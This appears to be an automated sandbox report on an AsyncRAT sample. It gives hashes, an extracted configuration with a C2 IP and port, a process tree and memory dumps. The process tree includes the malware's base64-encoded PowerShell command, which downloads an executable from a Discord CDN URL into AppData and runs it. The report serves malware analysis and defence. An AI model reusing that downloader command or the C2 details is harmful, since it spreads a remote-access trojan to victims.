Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    27-12-2022 07:17

General

  • Target

    279da621a31ae6331d05536c2bf5bab48290a22f276d50edc65aaa4f6d25abfa.exe

  • Size

    5KB

  • MD5

    f06d2b32fd1a26d08d0199b3e9942356

  • SHA1

    545fb4409348a4786e06654b647c15dfbe473137

  • SHA256

    279da621a31ae6331d05536c2bf5bab48290a22f276d50edc65aaa4f6d25abfa

  • SHA512

    9b01f6c989ed324b61cd4a1ca39dc3c745190af71a5a72853b08a18b9ead454a3689ee553ef1cd31e7da478eda27712bd0a7666a4e9857a73c85118ebcfd64d8

  • SSDEEP

    96:u679uSCFHm+NEsdPML8M/mYG4ntvngd3ojfrl:uc9uZF5NEqP68M/m2gdA

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DefenderSmartScren

C2

217.64.31.3:8437

Mutex

DefenderSmartScren

Attributes
  • delay

    3

  • install

    false

  • install_file

    SecurityHealtheurvice.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Async RAT payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\279da621a31ae6331d05536c2bf5bab48290a22f276d50edc65aaa4f6d25abfa.exe
    "C:\Users\Admin\AppData\Local\Temp\279da621a31ae6331d05536c2bf5bab48290a22f276d50edc65aaa4f6d25abfa.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1004
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAYgBmACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA2ADYANQAzADEANgA0ADAAOAA4ADEAMwA5ADgAMQA3AC8AMQAwADUANgA2ADUAMwA4ADEANwA2ADYAOQA3ADYANwAxADkAOAAvAGwAYwBvAG0AcABsAGMAbQBwAG8ALgBlAHgAZQAnACwAIAA8ACMAcQBwAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGYAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBmAHIAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAyAC4AZQB4AGUAJwApACkAPAAjAGsAZgB5ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAG0AawB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBoAGYAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAyAC4AZQB4AGUAJwApADwAIwB2AG4AcgAjAD4A"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4128
      • C:\Users\Admin\AppData\Roaming\2.exe
        "C:\Users\Admin\AppData\Roaming\2.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4120
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
            PID:4808
    • C:\Users\Admin\AppData\Roaming\2.exe
      C:\Users\Admin\AppData\Roaming\2.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3272
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        2⤵
          PID:5044

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Discovery

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2.exe.log
        Filesize

        902B

        MD5

        22ef0590c345545e384ba168af281f75

        SHA1

        77a5e71b08568a14c7305f479a073a27fd73bb9e

        SHA256

        ddc570d8f07709e4c8bbca0c8408d423f767aeabe413be9953fa999bcd66ea9f

        SHA512

        150d090f4d6278159a1d0eab0a4d67794c5eeed5484c6091cd055eac3a88d8e580655d5d5d3e46c62276e300d30625a1e7d1a9325ce1eb58cf2a1876777ac617

      • C:\Users\Admin\AppData\Roaming\2.exe
        Filesize

        14.7MB

        MD5

        6f6b812c166e53dc9b52b9b60e5ed369

        SHA1

        e60cf5e718c030182dec6f7fbbbbf884fcdfcca1

        SHA256

        ffead35df6bc101476d76393619fe0a06a57d93927417d9bcf814d2e4c6b36a0

        SHA512

        8e8e5fe21f4b08a053255beb0f4e55f03e0114e7fa2117b8ef8320e7fd88275771394cd9a7e4237793b370f980ff7ed45a6ff78d3d97d59cd077868e7602f4b9

      • C:\Users\Admin\AppData\Roaming\2.exe
        Filesize

        14.7MB

        MD5

        6f6b812c166e53dc9b52b9b60e5ed369

        SHA1

        e60cf5e718c030182dec6f7fbbbbf884fcdfcca1

        SHA256

        ffead35df6bc101476d76393619fe0a06a57d93927417d9bcf814d2e4c6b36a0

        SHA512

        8e8e5fe21f4b08a053255beb0f4e55f03e0114e7fa2117b8ef8320e7fd88275771394cd9a7e4237793b370f980ff7ed45a6ff78d3d97d59cd077868e7602f4b9

      • C:\Users\Admin\AppData\Roaming\2.exe
        Filesize

        14.7MB

        MD5

        6f6b812c166e53dc9b52b9b60e5ed369

        SHA1

        e60cf5e718c030182dec6f7fbbbbf884fcdfcca1

        SHA256

        ffead35df6bc101476d76393619fe0a06a57d93927417d9bcf814d2e4c6b36a0

        SHA512

        8e8e5fe21f4b08a053255beb0f4e55f03e0114e7fa2117b8ef8320e7fd88275771394cd9a7e4237793b370f980ff7ed45a6ff78d3d97d59cd077868e7602f4b9

      • memory/1004-115-0x00000000008B0000-0x00000000008B8000-memory.dmp
        Filesize

        32KB

      • memory/4120-181-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-204-0x0000000006B30000-0x000000000702E000-memory.dmp
        Filesize

        5.0MB

      • memory/4120-147-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-148-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-149-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-150-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-151-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-153-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-154-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-155-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-157-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-156-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-159-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-158-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-160-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-161-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-162-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-163-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-164-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-165-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-166-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-167-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-168-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-169-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-170-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-186-0x00000000084B0000-0x0000000008676000-memory.dmp
        Filesize

        1.8MB

      • memory/4120-172-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-173-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-174-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-175-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-176-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-177-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-178-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-179-0x00000000007C0000-0x0000000001672000-memory.dmp
        Filesize

        14.7MB

      • memory/4120-180-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-145-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-182-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-183-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-141-0x0000000000000000-mapping.dmp
      • memory/4120-143-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-171-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-187-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-188-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-189-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-190-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-191-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-192-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-193-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-194-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-195-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-196-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-197-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-198-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-199-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-200-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-201-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-202-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-203-0x0000000006080000-0x000000000611C000-memory.dmp
        Filesize

        624KB

      • memory/4120-146-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-205-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-206-0x00000000067E0000-0x0000000006872000-memory.dmp
        Filesize

        584KB

      • memory/4120-207-0x0000000006930000-0x00000000069CC000-memory.dmp
        Filesize

        624KB

      • memory/4120-211-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-184-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4120-185-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4128-122-0x00000202CA350000-0x00000202CA372000-memory.dmp
        Filesize

        136KB

      • memory/4128-116-0x0000000000000000-mapping.dmp
      • memory/4128-125-0x00000202E2ED0000-0x00000202E2F46000-memory.dmp
        Filesize

        472KB

      • memory/4808-208-0x0000000000400000-0x0000000000412000-memory.dmp
        Filesize

        72KB

      • memory/4808-209-0x000000000040D06E-mapping.dmp
      • memory/4808-210-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4808-212-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4808-213-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4808-215-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4808-214-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
        Filesize

        1.6MB

      • memory/4808-258-0x0000000000580000-0x0000000000592000-memory.dmp
        Filesize

        72KB

      • memory/5044-331-0x000000000040D06E-mapping.dmp